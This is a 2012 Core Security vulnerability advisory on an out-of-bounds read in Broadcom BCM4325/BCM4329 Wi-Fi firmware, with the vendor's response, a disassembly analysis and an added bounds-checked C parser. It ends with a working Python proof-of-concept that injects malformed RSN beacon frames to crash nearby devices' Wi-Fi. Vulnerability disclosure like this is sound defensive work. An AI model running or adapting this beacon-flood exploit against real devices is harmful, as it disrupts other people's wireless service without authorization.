**Title:** Broadcom DoS on BCM4325 and BCM4329 devices
**Advisory ID:** CORE-2012-0718
**Advisory URL:** http://www.coresecurity.com/content/broadcom-input-validation-BCM4325-BCM4329
**Date published:** 2012-10-23
**Date of last update:** 2012-10-23
**Vendors contacted:** Broadcom Corporation
**Release mode:** User release
**Class:** Input validation error [CWE-20]
**Impact:** Denial of service
**Remotely Exploitable:** Yes
**Locally Exploitable:** No
**CVE Name:** CVE-2012-2619
An out-of-bounds read error condition exists in the firmware of Broadcom's BCM4325 and BCM4329 combo solutions. This error can be leveraged to mount a denial of service attack, and possibly to disclose information. An attacker can send a crafted RSN (802.11i) information element that causes the Wi-Fi NIC to stop responding.
Products containing BCM4325 and BCM4329 chipsets:
Vendor notifies that the following products are not subject to the DoS issue:
Broadcom’s official response:
“CORE Security Technologies has identified a potential Denial-of-Service (DoS) vulnerability in certain older Broadcom Wi-Fi chips, specifically the BCM4325 and BCM4329. Other Broadcom chips are not affected. This DoS issue identified by CORE Security Technologies, which would require significant technical expertise to mount, could cause certain consumer electronics devices containing these chips to experience a transient WLAN service interruption as long as the DoS is active. During the service interruption, other phone/tablet features would be unaffected. The DoS issue does not in any way compromise the security of users’ data. Broadcom has a patch available that addresses the issue and makes devices that include the BCM4325 and BCM4329 immune to a potential attack. Customers are accepting the patch on a case by case basis, recognizing that most affected devices are out of service. Broadcom has issued a patch that can make devices using the BCM4325 and BCM4329 chips immune to the issue as well. Broadcom has been working with our customers providing information and fixes as required and will continue doing so in response to address security and performance issues that may be identified.”
This vulnerability was discovered by Andres Blanco. The proof of concept and additional research were carried out by Andres Blanco and Matias Eissler from the Core Impact team. The publication of this advisory was coordinated by Fernando Miranda from the Core Advisories Team.
Core Advisories Team would also like to thank CERT Coordination Center [1] for their assistance during the vulnerability reporting process.
00008E72 08 EB 8A 03    ADD.W   R3, R8, R10,LSL#2   ; auth_suite_count_ptr + auth_suite_count * 4
00008E76 9B 78          LDRB    R3, [R3,#2]         ; out-of-bounds read
At 0x00008E72 the register R8 contains the address within the RSN information element at which the "authentication suite count" field begins. Register R10 contains the 2-byte unsigned value of the "authentication suite count" field, which can be controlled by an attacker. This value is multiplied by 4 (shifted left 2 bits), because each authentication suite selector is 4 bytes (a 3-byte OUI and a 1-byte suite type), and is added to the authentication suite count pointer. Finally, an LDRB (load byte) instruction attempts to load a byte from the resulting address plus 2 bytes (the size of the authentication suite count field). The computed address is never compared against the length of the information element, so the load reads past the end of the element, resulting in an out-of-bounds read error.
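The following is an added example, not code from the advisory nor from Broadcom's firmware. It contrasts the unchecked offset arithmetic described by the disassembly above (count pointer + count * 4 + 2, reproduced as arithmetic only, with no memory access past the buffer) with a bounds-checked RSN information element parser that rejects a suite count larger than the bytes remaining in the element. It assumes, from the "+2" in the disassembly, that the byte being fetched is the RSN Capabilities field that follows the AKM suite list. The `POC_IES` bytes are the tagged parameters of the advisory's PoC beacon; `GOOD_RSN` is a constructed well-formed element for comparison.

```c
/* Added example: bounds-checked RSN IE parsing versus the unchecked
 * offset computation the advisory's disassembly describes. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define IE_ID_RSN 48

struct rsn_info {
    uint16_t version;
    uint32_t group_cipher;   /* suite selector packed as OUI:type, 0x000fac04 = CCMP */
    uint16_t pairwise_count;
    uint16_t akm_count;
    uint32_t first_akm;      /* 0x000fac02 = PSK */
    uint16_t capabilities;
};

struct rsn_info g_info;      /* scratch output used by main() and the checks */

static uint16_t le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t suite(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Mirrors ADD.W R3,R8,R10,LSL#2 ; LDRB R3,[R3,#2]: returns the offset, from the
 * start of the RSN IE body, that the firmware would dereference to fetch the RSN
 * Capabilities byte. Only the arithmetic is reproduced; nothing beyond body_len
 * is read. SIZE_MAX means the count fields themselves do not fit. */
size_t unchecked_cap_offset(const uint8_t *body, size_t body_len)
{
    size_t akm_off;
    if (body_len < 8)
        return SIZE_MAX;
    akm_off = 8 + (size_t)le16(body + 6) * 4;             /* skip pairwise list */
    if (akm_off + 2 > body_len)
        return SIZE_MAX;
    return akm_off + (size_t)le16(body + akm_off) * 4 + 2; /* no length check here */
}

/* Bounds-checked parse. Returns 0 on success, -1 when a count field claims more
 * suites than the remaining IE bytes can hold (the advisory's case). */
int rsn_parse(const uint8_t *body, size_t len, struct rsn_info *out)
{
    size_t off;
    if (len < 8)
        return -1;
    out->version = le16(body);
    out->group_cipher = suite(body + 2);
    out->pairwise_count = le16(body + 6);
    off = 8;
    /* count * 4 must fit in what is left; dividing the remainder avoids overflow */
    if ((len - off) / 4 < out->pairwise_count)
        return -1;
    off += (size_t)out->pairwise_count * 4;
    if (len - off < 2)
        return -1;
    out->akm_count = le16(body + off);
    off += 2;
    if ((len - off) / 4 < out->akm_count)   /* the check the firmware lacked */
        return -1;
    out->first_akm = out->akm_count ? suite(body + off) : 0;
    off += (size_t)out->akm_count * 4;
    /* RSN Capabilities are optional: absent is fine, truncated is not */
    if (len - off == 0)
        out->capabilities = 0;
    else if (len - off >= 2)
        out->capabilities = le16(body + off);
    else
        return -1;
    return 0;
}

/* Walks the tagged parameters of a beacon/probe response body. Returns 1 if an
 * RSN IE is present and parses cleanly, 0 if there is none, -1 if the IE chain
 * or the RSN IE is malformed. */
int check_beacon_ies(const uint8_t *ies, size_t len, struct rsn_info *out)
{
    size_t off = 0;
    while (len - off >= 2) {
        uint8_t id = ies[off], ielen = ies[off + 1];
        if (len - off - 2 < ielen)
            return -1;          /* IE claims more bytes than the frame carries */
        if (id == IE_ID_RSN)
            return rsn_parse(ies + off + 2, ielen, out) == 0 ? 1 : -1;
        off += 2u + ielen;
    }
    return 0;
}

/* Tagged parameters from the advisory's PoC beacon (SSID, rates, DS, RSN) */
const uint8_t POC_IES[] = {
    0x00, 0x05, 'b', 'u', 'g', 'g', 'y',
    0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
    0x03, 0x01, 0x06,
    0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f,
    0xac, 0x00, 0xff, 0xff, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00
};
/* Constructed well-formed RSN IE body: CCMP group, 1 x CCMP pairwise, 1 x PSK, caps 0 */
const uint8_t GOOD_RSN[] = {
    0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04,
    0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00
};

int main(void)
{
    printf("PoC IEs: %d (firmware would read offset %zu of a 20-byte element)\n",
           check_beacon_ies(POC_IES, sizeof POC_IES, &g_info),
           unchecked_cap_offset(POC_IES + 22, 20));
    printf("well-formed RSN body: %d\n", rsn_parse(GOOD_RSN, sizeof GOOD_RSN, &g_info));
    return 0;
}
```

For the PoC element the unchecked arithmetic lands 262154 bytes into a 20-byte element, which is the read the advisory describes; the checked parser refuses the element as soon as the AKM count exceeds what the remaining 6 bytes can hold, without ever computing the address.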
This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3][4], a Python wrapper for the Lorcon library.
------------------------- poc.py -------------------------
```python
#!/usr/bin/env python
# Python 2 script: PyLorcon2 is a Python 2 wrapper for Lorcon.
import sys
import time
import struct
import PyLorcon2

def beaconFrameGenerator():
    sequence = 0
    while(1):
        sequence = sequence % 4096
        # Frame Control
        frame = '\x80'  # Version: 0 - Type: Management - Subtype: Beacon
        frame += '\x00'  # Flags: 0
        frame += '\x00\x00'  # Duration: 0
        frame += '\xff\xff\xff\xff\xff\xff'  # Destination: ff:ff:ff:ff:ff:ff
        frame += '\x00\x00\x00\x15\xde\xad'  # Source: 00:00:00:15:de:ad
        frame += '\x00\x00\x00\x15\xde\xad'  # BSSID: 00:00:00:15:de:ad
        # Sequence Control: Fragment 0 in the low 4 bits, Sequence number in the high 12
        frame += struct.pack('<H', sequence << 4)
        # Frame Body
        frame += struct.pack('<Q', int(time.time()))  # Timestamp
        frame += '\x64\x00'  # Beacon Interval: 0.102400 seconds
        frame += '\x11\x04'  # Capability Information: ESS, Privacy, Short Slot Time
        # Information Elements
        # SSID: buggy
        frame += '\x00\x05buggy'
        # Supported Rates: 1,2,5.5,11,18,24,36,54
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
        # DS Parameter Set: 6
        frame += '\x03\x01\x06'
        # RSN IE
        frame += '\x30'  # ID: 48
        frame += '\x14'  # Size: 20
        frame += '\x01\x00'  # Version: 1
        frame += '\x00\x0f\xac\x04'  # Group cipher suite: 00-0F-AC:4 (CCMP)
        frame += '\x01\x00'  # Pairwise cipher suite count: 1
        frame += '\x00\x0f\xac\x00'  # Pairwise cipher suite 1: 00-0F-AC:0 (use group cipher suite)
        frame += '\xff\xff'  # Authentication suites count: 65535 (the out-of-range count)
        frame += '\x00\x0f\xac\x02'  # Authentication suite 1: 00-0F-AC:2 (PSK)
        frame += '\x00\x00'  # RSN Capabilities: 0
        sequence += 1
        yield frame

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage:"
        print "\t%s <wireless interface>" % sys.argv[0]
        sys.exit(-1)
    iface = sys.argv[1]
    context = PyLorcon2.Context(iface)
    context.open_injmon()  # monitor mode with injection enabled
    generator = beaconFrameGenerator()
    for i in range(10000):
        frame = generator.next()
        time.sleep(0.100)
        context.send_bytes(frame)
```
[1] CERT Coordination Center. <http://www.cert.org/>
[2] Lorcon official web site. <https://code.google.com/p/lorcon>
[3] PyLorcon2 wrapper. <http://code.google.com/p/pylorcon2>
[4] PyLorcon2 building and installing. <http://code.google.com/p/pylorcon2/wiki/BuildingPyLorcon2>
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://corelabs.coresecurity.com>.
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security’s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company’s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: <http://www.coresecurity.com>.
The contents of this advisory are copyright © 2012 Core Security Technologies and © 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.